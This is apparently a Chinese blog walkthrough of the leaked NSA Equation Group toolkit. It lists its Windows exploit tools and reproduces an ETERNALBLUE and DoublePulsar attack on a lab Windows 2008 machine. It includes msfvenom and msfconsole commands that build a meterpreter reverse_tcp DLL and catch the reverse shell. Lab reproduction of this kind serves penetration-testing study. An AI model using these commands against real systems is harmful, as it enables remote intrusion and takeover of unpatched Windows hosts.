2017 Equation Group 0day Tools

概述

Shadow Brokers黑客组织上周泄露了NSA方程式组织的一些工具,其中某些工具客直接拿下Windows服务器 。

工具包安装

  1. 下载安装 python-2.6.6.msi ,pywin32-221.win32-py2.6.exe
  2. 下载解压 shadowbroker
  3. shadowbrokerwindows 目录下新建 listeningposts 目录。

工具包简介

  • swift 银行攻击的证据
  • oddjob 植入后门等相关文档
  • windows 包含了各种漏洞利用工具

最主要还是Windows目录,其包含了各种漏洞利用工具,在exploits中包含了丰富的漏洞利用工具,可影响windows多个平台。

Exploits

包含了很多漏洞利用工具,经过大佬们的初步梳理,重点关注对win server有影响的几个工具。

Tools Service Port Describe
Explodingcan IIS IIS漏洞利用工具,只对Windows 2003有影响
Eternalromance 139和445 MS17-010 SMB 和 NBT漏洞利用工具
Emphasismine 143 通过ICMP漏洞工具
Englishmansdentist SMTP(25) 通过SMTP漏洞工具
Erraticgopher RPC(445) 通过RPC漏洞工具
Eskimoroll 88 MS14-068 漏洞利用工具,通过kerberos入侵
Eclipsedwing SMB(445) MS08-67 漏洞利用工具
Educatedscholar SMB(445) MS09-050 漏洞利用工具
Emeraldthread 139和445 MS10-061 MB和 Netbios 漏洞利用工具
Zippybeer SMB(445) SMTP漏洞利用工具
Eternalsynergy SMB(445) MS17-010 SMB漏洞利用工具
Esteemaudit RDP(3389) RDP漏洞利用工具

FUZZBUNCH

是一个类似 MSF的漏洞利用平台工具,python编写。

Specials

Tools Service Port Describe
ETERNALBLUE SMB(445) SMB漏洞利用工具,xp、2003、2008、7均有部分覆盖(MS17-010)
ETERNALCHAMPION SMB(445) SMB漏洞利用工具,xp、2003、2008、7均有部分覆盖(CVE-2017-0146/0147)

ETERNALBLUE

实验环境

攻击机1

攻击机2

  • kali 2016.2
  • IP : 192.168.111.144

靶机

  • win2008
  • IP : 192.168.111.158

systeminfo 信息如下:
ETERNALBLUE-1

复现过程

初始化配置,创建一个攻击项目。

ETERNALBLUE-2

ETERNALBLUE-3

ETERNALBLUE-4

使用 ETERNALBLUE 模块。

ETERNALBLUE-5

ETERNALBLUE-6

ETERNALBLUE-7

ETERNALBLUE-8

使用 DoublePulsar 模块。

DoublePulsar是一个后门程序,用于在已感染的系统上注入和运行恶意代码。这是一种NSA用作监听使用的后门程序,如今在GitHub上得到免费发布后,任何人均可使用。其软件是在Windows XP到Server 2008 R2系统版本中的计算机上,通过使用EternalBlue Exploit的SMB文件共享服务端口启动旧版本下的远程执行代码RCE,随后进行程序的安装。也就是说,会受到攻击影响的计算机系统是存在漏洞的Windows版本,因为这给攻击者提供了其SMB端口。

这里要选择SMB和对应的目标操作系统位数下面的话是攻击的4个操作 选择RunDLL。

ETERNALBLUE-9

ETERNALBLUE-10

这里用攻击机2 kali的msfvenom 生成一下dll 这里使用的是reverse_tcp的paylaod 可以根据网络情况采用其他payload

1
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.144 LPORT=5555 -f dll > s.dll

ETERNALBLUE-11

把生成的s.dll传到攻击机1上去,

然后kali开启msfconsole 监听,下面的payload要和上面msfvenom的payload对应起来

1
2
3
4
5
6
$ msfconsole
msf > use exploit/multi/handler
msf > set LHOST 192.168.111.144
msf > set LPORT 5555
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit

ETERNALBLUE-12

ETERNALBLUE-13

然后操作fb.py ,加载s.dll。

ETERNALBLUE-14

ETERNALBLUE-15

kali 收到反弹的shell 。

ETERNALBLUE-16

总结

当然,还有其他的攻击模块,下次继续更新。

为了平时的渗透测试的方便,我临时写了个检测的脚本(测试版),供大家测试使用。

参考

ShadowBrokers方程式工具包浅析,揭秘方程式组织工具包的前世今生
方程式 0day ETERNALBLUE 复现过程